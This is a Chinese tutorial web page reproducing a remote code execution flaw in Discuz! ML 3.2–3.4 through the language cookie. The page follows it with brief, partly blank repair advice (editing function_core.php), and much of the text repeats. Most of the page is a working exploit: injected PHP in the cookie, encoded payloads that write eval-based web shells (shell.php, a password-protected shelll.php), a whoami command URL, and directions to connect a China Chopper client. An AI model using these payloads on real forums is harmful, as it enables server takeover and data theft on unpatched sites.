您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程
Discuz! ML RCE漏洞getshell修复
雁卉2025-07-08Discuz教程已有人查阅
导读Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。0x01 影响版本
0x00 Discuz简介
Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。0x01 影响版本
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.40x02 环境搭建
phpstudy(php-7.2.10-nts Apache)
Discuz 3.4 源码(官网下载:http://discuz.ml/download 之后将源码解压到根目录 /WWW)0x03 漏洞复现
右上角语言标识,随便选择一种语言并抓包
将抓到的包发送到repeater模块
将包中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,得到了phpinfo信息,如下图:
Getshell
exp:
解码后:
查看文件upload
url后加shell.php?cmd=system('whoami');
Exp:
将包中cookie的xxxxx_language参数值改为exp,可以看到成功执行了代码,在文件夹中多出了shelll.php文件,
如下图
访问执行shelll.php
执行后使用菜刀连接
http://127.0.0.1/discuz/upload/shelll.php
密码:a1(可自己修改)
0x04 修复建议
(1)修改source/function/function_core.php 644行为:
(3)或者安装较新补丁。
Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。0x01 影响版本
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.40x02 环境搭建
phpstudy(php-7.2.10-nts Apache)
Discuz 3.4 源码(官网下载:http://discuz.ml/download 之后将源码解压到根目录 /WWW)0x03 漏洞复现
右上角语言标识,随便选择一种语言并抓包
将抓到的包发送到repeater模块
将包中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,得到了phpinfo信息,如下图:
Getshell
exp:
解码后:
'. file_put_contents('shell.php',urldecode('%3c%3fphp %20eval(%24_%47%45%54%5b%22cmd%22%5d)%3b%3f%3e')).'
解码前:
'. file_put_contents('shell.php',urldecode('')
将包中的xxxxx_language参数值改为解码后的exp,可以看到成功执行了代码,在文件夹中多出了shell.php文件,查看文件upload
url后加shell.php?cmd=system('whoami');
url:http://127.0.0.1/discuz/upload/shell.php?cmd=system('whoami');
直接执行了whoami命令Exp:
'. file_put_contents('shelll.php',urldecode('%3c%3fphp %20eval(%24_%50%4f%53%54%5b%22a1%22%5d)%3b%3f%3e')).'
原语句:<?php eval($_POST["a1"]);?>将包中cookie的xxxxx_language参数值改为exp,可以看到成功执行了代码,在文件夹中多出了shelll.php文件,
如下图
访问执行shelll.php
执行后使用菜刀连接
http://127.0.0.1/discuz/upload/shelll.php
密码:a1(可自己修改)
0x04 修复建议
(1)修改source/function/function_core.php 644行为:
/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';
(2)删除可控变量。(3)或者安装较新补丁。
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
上一篇:Discuz项目新建子网站的方法
相关教程
图文教程
基于docker构建discuz论坛的方法
下载discuz的zip包,将discuz论坛包解压:目录内容:新建docker-compose.yml文件:执行之后说是需要先执行下docker-compose build之后再执行 docker-compose up -d
Discuz<7.2 SQL注入漏洞分析
"魔术引号带来的新的安全问题"一节里,有提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体现,如下面的代码片段:
discuz门户首页header模板语法详解和注释
header文件引用了跟多通用模板,所以整个文章会很长,现在比较忙,注释工作会不定期进行首先开下门户首页的文件portal里面的index.htmcommon文件下的header_开头的几个文件header.htm
Discuz!NT3.6与网站整合操作用户信息的方法
因为网站要加个论坛,所以就用到了Discuz!NT3.6。可惜目前官方论坛已经关闭,只有3.6版本的有源码,3.9的没有源码,不好操作。
相关源码
-
(PC+WAP)蓝色弹簧针厂家探针充电连接器设备网站源码下载基于PbootCMS开发的响应式模板,为弹簧针、探针连接器等电子元器件企业设计。模板采用工业蓝主色调,突出产品技术特性,支持多维度展示连接器产品的规格参数与应用场景,帮助制造企业建立专业线上展示平台。查看源码 -
(带手机版)绿色生态农业种植农产品网站pbootcms源码下载本模板基于PbootCMS内核开发,为生态农业企业量身打造,适用于农业种植、有机农场、农产品电商等业务场景。模板设计充分体现绿色环保理念,突出农业特色,同时保持简洁大气的视觉效果,帮助农业企业建立专业形象。查看源码 -
(自适应)蓝色英文外贸电子科技产品带三级栏目网站模板为外贸企业设计的英文网站模板,基于PbootCMS系统开发。突出多语言支持和国际化布局,三级栏目结构清晰展示产品分类,响应式设计确保更好客户在移动端和PC端获得一致的专业体验。查看源码 -
(自适应html5)自媒体运营培训教程个人博客pbootcms模板本模板基于PbootCMS系统开发,特别适合自媒体运营培训、知识付费类网站使用。采用响应式设计,能够适配各类终端设备,为内容创作者提供专业的内容展示平台。查看源码 -
(PC+WAP)绿色硅胶橡胶玩具制品营销型网站源码下载为硅胶橡胶制品及玩具行业打造的营销型网站模板,采用PbootCMS内核开发,通过模块化设计实现产品参数、安全认证、应用场景等专业内容的可视化呈现,助力企业建立可信赖的线上展示平台。查看源码 -
(自适应)工业机械制造设备网站pbootcms模板下载为机械制造、工业设备类企业设计,特别适合各类机械设备、生产线、工业自动化产品展示。采用响应式技术,确保在不同设备上都能清晰展示机械产品的技术参数和细节特点。查看源码
| 分享笔记 (共有 篇笔记) |
